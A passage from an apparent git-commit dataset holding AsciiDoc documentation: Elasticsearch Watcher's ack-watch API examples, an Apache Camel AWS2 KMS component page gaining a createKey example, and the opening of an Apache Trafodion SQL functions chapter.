_watcher\/watch\/<watch_id>\/_ack\/<action_id>`\n\n[[watcher-api-ack-watch-prereqs]]\n==== {api-prereq-title}\n\n* You must have `manage_watcher` cluster privileges to use this API. For more\ninformation, see <<security-privileges>>.\n\n[[watcher-api-ack-watch-desc]]\n==== {api-description-title}\n\nAn action's _acknowledgement state_ is stored in the\n`status.actions.<id>.ack.state` structure.\n\nIMPORTANT: If the specified watch is currently being executed, this API will\nreturn an error. The reason for this is to prevent overwriting of the watch\nstatus from a watch execution.\n\n[[watcher-api-ack-watch-path-params]]\n==== {api-path-parms-title}\n\n`<action_id>`::\n (Optional, list) A comma-separated list of the action IDs to acknowledge. If you omit\n this parameter, all of the actions of the watch are acknowledged.\n\n`<watch_id>`::\n (Required, string) Identifier for the watch.\n\n\/\/[[watcher-api-ack-watch-query-params]]\n\/\/==== {api-query-parms-title}\n\n\/\/[[watcher-api-ack-watch-request-body]]\n\/\/==== {api-request-body-title}\n\n\/\/[[watcher-api-ack-watch-response-body]]\n\/\/==== {api-response-body-title}\n\n\/\/[[watcher-api-ack-watch-response-codes]]\n\/\/==== {api-response-codes-title}\n\n[[watcher-api-ack-watch-example]]\n==== {api-examples-title}\n\nTo demonstrate let's create a new watch:\n\n[source,console]\n--------------------------------------------------\nPUT _watcher\/watch\/my_watch\n{\n \"trigger\": {\n \"schedule\": {\n \"hourly\": {\n \"minute\": [ 0, 5 ]\n }\n }\n },\n \"input\": {\n \"simple\": {\n \"payload\": {\n \"send\": \"yes\"\n }\n }\n },\n \"condition\": {\n \"always\": {}\n },\n \"actions\": {\n \"test_index\": {\n \"throttle_period\": \"15m\",\n \"index\": {\n \"index\": \"test\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTSETUP\n\nThe current status of a watch and the state of its actions is returned with the\nwatch definition when you call the <<watcher-api-get-watch, Get Watch API>>:\n\n[source,console]\n--------------------------------------------------\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\nThe action state of a newly-created watch is `awaits_successful_execution`:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_seq_no\": 0,\n \"_primary_term\": 1,\n \"_version\": 1,\n \"_id\": \"my_watch\",\n \"status\": {\n \"version\": 1,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"awaits_successful_execution\"\n }\n }\n },\n \"state\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\nWhen the watch executes and the condition matches, the value of the `ack.state`\nchanges to `ackable`. Let's force execution of the watch and fetch it again to\ncheck the status:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_execute\n{\n \"record_execution\" : true\n}\n\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\/\/ TEST[continued]\n\nand the action is now in `ackable` state:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"my_watch\",\n \"_seq_no\": 1,\n \"_primary_term\": 1,\n \"_version\": 2,\n \"status\": {\n \"version\": 2,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"ackable\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n }\n }\n },\n \"state\": ...,\n \"execution_state\": \"executed\",\n \"last_checked\": ...,\n \"last_met_condition\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"last_checked\": \\.\\.\\.\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \\.\\.\\.\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\nNow we can acknowledge it:\n\n[source,console]\n--------------------------------------------------\nPUT _watcher\/watch\/my_watch\/_ack\/test_index\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\/\/ TEST[continued]\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"my_watch\",\n \"_seq_no\": 2,\n \"_primary_term\": 1,\n \"_version\": 3,\n \"status\": {\n \"version\": 3,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"acked\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n }\n }\n },\n \"state\": ...,\n \"execution_state\": \"executed\",\n \"last_checked\": ...,\n \"last_met_condition\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"last_checked\": \\.\\.\\.\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \\.\\.\\.\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\nAcknowledging an action throttles further executions of that action until its\n`ack.state` is reset to `awaits_successful_execution`. This happens when the\ncondition of the watch is not met (the condition evaluates to `false`).\n\nYou can acknowledge multiple actions by assigning the `actions` parameter a\ncomma-separated list of action ids:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_ack\/action1,action2\n--------------------------------------------------\n\nTo acknowledge all of the actions of a watch, simply omit the `actions`\nparameter:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_ack\n--------------------------------------------------\n\/\/ TEST[s\/^\/POST _watcher\\\/watch\\\/my_watch\\\/_execute\\n{ \"record_execution\" : true }\\n\/]\n\n\nThe response looks like a get watch response, but only contains the status:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"status\": {\n \"state\": {\n \"active\": true,\n \"timestamp\": \"2015-05-26T18:04:27.723Z\"\n },\n \"last_checked\": \"2015-05-26T18:04:27.753Z\",\n \"last_met_condition\": \"2015-05-26T18:04:27.763Z\",\n \"actions\": {\n \"test_index\": {\n \"ack\" : {\n \"timestamp\": \"2015-05-26T18:04:27.713Z\",\n \"state\": \"acked\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.733Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.773Z\",\n \"successful\": true\n }\n }\n },\n \"execution_state\": \"executed\",\n \"version\": 2\n }\n}\n\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"last_checked\": \"2015-05-26T18:04:27.753Z\"\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \"2015-05-26T18:04:27.763Z\"\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.state.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.713Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.733Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.773Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_successful_execution.timestamp\"\/]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"24663ce052ffc24a2e03567f7b49b6e7f61f114b","subject":"Camel-AWS2-KMS: Added CreateKey Example","message":"Camel-AWS2-KMS: Added CreateKey Example\n","repos":"gnodet\/camel,cunningt\/camel,pax95\/camel,nicolaferraro\/camel,adessaigne\/camel,alvinkwekel\/camel,gnodet\/camel,christophd\/camel,pmoerenhout\/camel,christophd\/camel,cunningt\/camel,apache\/camel,apache\/camel,adessaigne\/camel,cunningt\/camel,apache\/camel,mcollovati\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,nicolaferraro\/camel,pax95\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,tdiesler\/camel,tdiesler\/camel,adessaigne\/camel,nikhilvibhav\/camel,tadayosi\/camel,gnodet\/camel,nikhilvibhav\/camel,apache\/camel,alvinkwekel\/camel,pax95\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,mcollovati\/camel,pax95\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,pmoerenhout\/camel,christophd\/camel,cunningt\/camel,mcollovati\/camel,christophd\/camel,tadayosi\/camel,pmoerenhout\/camel,tdiesler\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,cunningt\/camel,pax95\/camel,alvinkwekel\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,mcollovati\/camel,adessaigne\/camel,apache\/camel,nikhilvibhav\/camel,adessaigne\/camel","old_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws2-kms-component.adoc","new_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws2-kms-component.adoc","new_contents":"[[aws2-kms-component]]\n= AWS 2 Key Management Service (KMS) Component\n:docTitle: AWS 2 Key Management Service (KMS)\n:artifactId: camel-aws2-kms\n:description: Manage keys stored in AWS KMS instances using AWS SDK version 2.x.\n:since: 3.1\n:supportLevel: Stable\n:component-header: Only producer is supported\n\/\/Manually maintained attributes\n:group: AWS 2\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe AWS2 KMS component supports the ability to work with keys stored in\nhttps:\/\/aws.amazon.com\/kms\/[AWS KMS] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon KMS. More information is available at\nhttps:\/\/aws.amazon.com\/kms\/[Amazon KMS].\n\n[NOTE]\n====\nThe AWS2 KMS component is not supported in OSGI\n====\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-kms:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS 2 Key Management Service (KMS) component supports 14 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoDiscoverClient* (common) | Setting the autoDiscoverClient mechanism, if true, the component will look for a client instance in the registry automatically otherwise it will skip that checking. | true | boolean\n| *configuration* (producer) | Component configuration | | KMS2Configuration\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | KmsClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. The value can be one of: listKeys, createKey, disableKey, scheduleKeyDeletion, describeKey, enableKey | | KMS2Operations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not | false | boolean\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (producer) | The region in which EKS client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (producer) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS 2 Key Management Service (KMS) endpoint is configured using URI syntax:\n\n----\naws2-kms:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (14 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoDiscoverClient* (common) | Setting the autoDiscoverClient mechanism, if true, the component will look for a client instance in the registry automatically otherwise it will skip that checking. | true | boolean\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | KmsClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. The value can be one of: listKeys, createKey, disableKey, scheduleKeyDeletion, describeKey, enableKey | | KMS2Operations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not | false | boolean\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (producer) | The region in which EKS client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (producer) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired KMS component options\n\nYou have to provide the amazonKmsClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/kms\/[Amazon KMS] service.\n\n== Usage\n\n=== Message headers evaluated by the KMS producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsKMSLimit` |`Integer` |The limit number of keys to return while performing a listKeys operation\n\n|`CamelAwsKMSOperation` |`String` |The operation we want to perform\n\n|`CamelAwsKMSDescription` |`String` |A key description to use while performing a createKey operation\n\n|`CamelAwsKMSKeyId` |`String` |The key Id \n|=======================================================================\n\n=== KMS Producer operations\n\nCamel-AWS KMS component provides the following operation on the producer side:\n\n- listKeys\n- createKey\n- disableKey\n- scheduleKeyDeletion\n- describeKey\n- enableKey\n\n== Producer Examples\n\n- listKeys: this operation will list the available keys in KMS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listKeys\")\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys\")\n--------------------------------------------------------------------------------\n\n- createKey: this operation will create a key in KMS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listKeys\")\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=createKey\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of KmsClient client in registry\n\nThe component is capable of detecting the presence of an KmsClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n== Using a POJO as body\n\nSometimes build an AWS Request can be complex, because of multiple options. We introduce the possibility to use a POJO as body.\nIn AWS KMS there are multiple operations you can submit, as an example for List keys request, you can do something like:\n\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:createUser\")\n .setBody(ListKeysRequest.builder().limit(10).build())\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly without the need of passing headers and options specifically related to this operation.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-kms<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\ninclude::camel-spring-boot::page$aws2-kms-starter.adoc[]\n","old_contents":"[[aws2-kms-component]]\n= AWS 2 Key Management Service (KMS) Component\n:docTitle: AWS 2 Key Management Service (KMS)\n:artifactId: camel-aws2-kms\n:description: Manage keys stored in AWS KMS instances using AWS SDK version 2.x.\n:since: 3.1\n:supportLevel: Stable\n:component-header: Only producer is supported\n\/\/Manually maintained attributes\n:group: AWS 2\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe AWS2 KMS component supports the ability to work with keys stored in\nhttps:\/\/aws.amazon.com\/kms\/[AWS KMS] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon KMS. More information is available at\nhttps:\/\/aws.amazon.com\/kms\/[Amazon KMS].\n\n[NOTE]\n====\nThe AWS2 KMS component is not supported in OSGI\n====\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-kms:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS 2 Key Management Service (KMS) component supports 14 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoDiscoverClient* (common) | Setting the autoDiscoverClient mechanism, if true, the component will look for a client instance in the registry automatically otherwise it will skip that checking. | true | boolean\n| *configuration* (producer) | Component configuration | | KMS2Configuration\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | KmsClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. The value can be one of: listKeys, createKey, disableKey, scheduleKeyDeletion, describeKey, enableKey | | KMS2Operations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not | false | boolean\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (producer) | The region in which EKS client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (producer) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS 2 Key Management Service (KMS) endpoint is configured using URI syntax:\n\n----\naws2-kms:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (14 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoDiscoverClient* (common) | Setting the autoDiscoverClient mechanism, if true, the component will look for a client instance in the registry automatically otherwise it will skip that checking. | true | boolean\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | KmsClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. The value can be one of: listKeys, createKey, disableKey, scheduleKeyDeletion, describeKey, enableKey | | KMS2Operations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not | false | boolean\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (producer) | The region in which EKS client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (producer) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired KMS component options\n\nYou have to provide the amazonKmsClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/kms\/[Amazon KMS] service.\n\n== Usage\n\n=== Message headers evaluated by the KMS producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsKMSLimit` |`Integer` |The limit number of keys to return while performing a listKeys operation\n\n|`CamelAwsKMSOperation` |`String` |The operation we want to perform\n\n|`CamelAwsKMSDescription` |`String` |A key description to use while performing a createKey operation\n\n|`CamelAwsKMSKeyId` |`String` |The key Id \n|=======================================================================\n\n=== KMS Producer operations\n\nCamel-AWS KMS component provides the following operation on the producer side:\n\n- listKeys\n- createKey\n- disableKey\n- scheduleKeyDeletion\n- describeKey\n- enableKey\n\n== Producer Examples\n\n- listKeys: this operation will list the available keys in KMS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listKeys\")\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of KmsClient client in registry\n\nThe component is capable of detecting the presence of an KmsClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n== Using a POJO as body\n\nSometimes build an AWS Request can be complex, because of multiple options. We introduce the possibility to use a POJO as body.\nIn AWS KMS there are multiple operations you can submit, as an example for List keys request, you can do something like:\n\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:createUser\")\n .setBody(ListKeysRequest.builder().limit(10).build())\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly without the need of passing headers and options specifically related to this operation.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-kms<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\ninclude::camel-spring-boot::page$aws2-kms-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b82c05b2ea9ca454c5abcccb6c4efa81b5221d52","subject":"[TRAFODION-2379] update sql reference manual about group_concat function","message":"[TRAFODION-2379] update sql reference manual about group_concat function\n","repos":"mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,rlugojr\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion,mashengchen\/incubator-trafodion","old_file":"docs\/sql_reference\/src\/asciidoc\/_chapters\/sql_functions_and_expressions.adoc","new_file":"docs\/sql_reference\/src\/asciidoc\/_chapters\/sql_functions_and_expressions.adoc","new_contents":"\/\/\/\/\r\n\/**\r\n* @@@ START COPYRIGHT @@@\r\n*\r\n* Licensed to the Apache Software Foundation (ASF) under one\r\n* or more contributor license agreements. See the NOTICE file\r\n* distributed with this work for additional information\r\n* regarding copyright ownership. The ASF licenses this file\r\n* to you under the Apache License, Version 2.0 (the\r\n* \"License\"); you may not use this file except in compliance\r\n* with the License. You may obtain a copy of the License at\r\n*\r\n* http:\/\/www.apache.org\/licenses\/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing,\r\n* software distributed under the License is distributed on an\r\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n* KIND, either express or implied. See the License for the\r\n* specific language governing permissions and limitations\r\n* under the License.\r\n*\r\n* @@@ END COPYRIGHT @@@\r\n*\/\r\n\/\/\/\/\r\n\r\n[[sql_functions_and_expressions]]\r\n= SQL Functions and Expressions\r\n\r\nThis section describes the syntax and semantics of specific functions\r\nand expressions that you can use in {project-name} SQL statements. The\r\nfunctions and expressions are categorized according to their\r\nfunctionality.\r\n\r\n[[standard_normalization]]\r\n== Standard Normalization\r\n\r\nFor datetime functions, the definition of standard normalization is: If\r\nthe ending day of the resulting date is invalid, the day will be rounded\r\nDOWN to the last day of the result month.\r\n\r\n== Aggregate (Set) Functions\r\n\r\nAn aggregate (or set) function operates on a group or groups of rows\r\nretrieved by the SELECT statement or the subquery in which the aggregate\r\nfunction appears.\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<avg_function,AVG Function>> | Computes the average of a group of numbers derived from the evaluation\r\nof the expression argument of the function.\r\n| <<count_function,COUNT Function>> | Counts the number of rows that result from a query (by using\r\n*) or the number of rows that contain a distinct value in the one-column\r\ntable derived from the expression argument of the function (optionally\r\ndistinct values).\r\n| <<group_concat_function,GROUP_CONCAT Function>> | This function returns a string result with the concatenated non-NULL \r\nvalues from a group.\r\n| <<max_function,MAX\/MAXIMUM Function>> | Determines a maximum value from the group of values derived from the\r\nevaluation of the expression argument.\r\n| <<min_function,MIN Function>> | Determines a minimum value from the group of values derived from the\r\nevaluation of the expression argument.\r\n| <<stddev_function,STDDEV Function>> | Computes the statistical standard deviation of a group of numbers\r\nderived from the evaluation of the expression argument of the function.\r\nThe numbers can be weighted.\r\n| <<sum_function,SUM Function>> | Computes the sum of a group of numbers derived from the evaluation of\r\nthe expression argument of the function.\r\n\"VARIANCE Function\" \r\nComputes the statistical variance of a group of numbers derived from the\r\nevaluation of the expression argument of the function. The numbers can\r\nbe weighted.\r\n|===\r\n\r\n\r\nColumns and expressions can be arguments of an aggregate function. The\r\nexpressions cannot contain aggregate functions or subqueries.\r\n\r\nAn aggregate function can accept an argument specified as DISTINCT,\r\nwhich eliminates duplicate values before the aggregate function is\r\napplied. See <<distinct_aggregate_functions,DISTINCT Aggregate Functions>>.\r\n\r\nIf you include a GROUP BY clause in the SELECT statement, the columns\r\nyou refer to in the select list must be either grouping columns or\r\narguments of an aggregate function. If you do not include\r\na 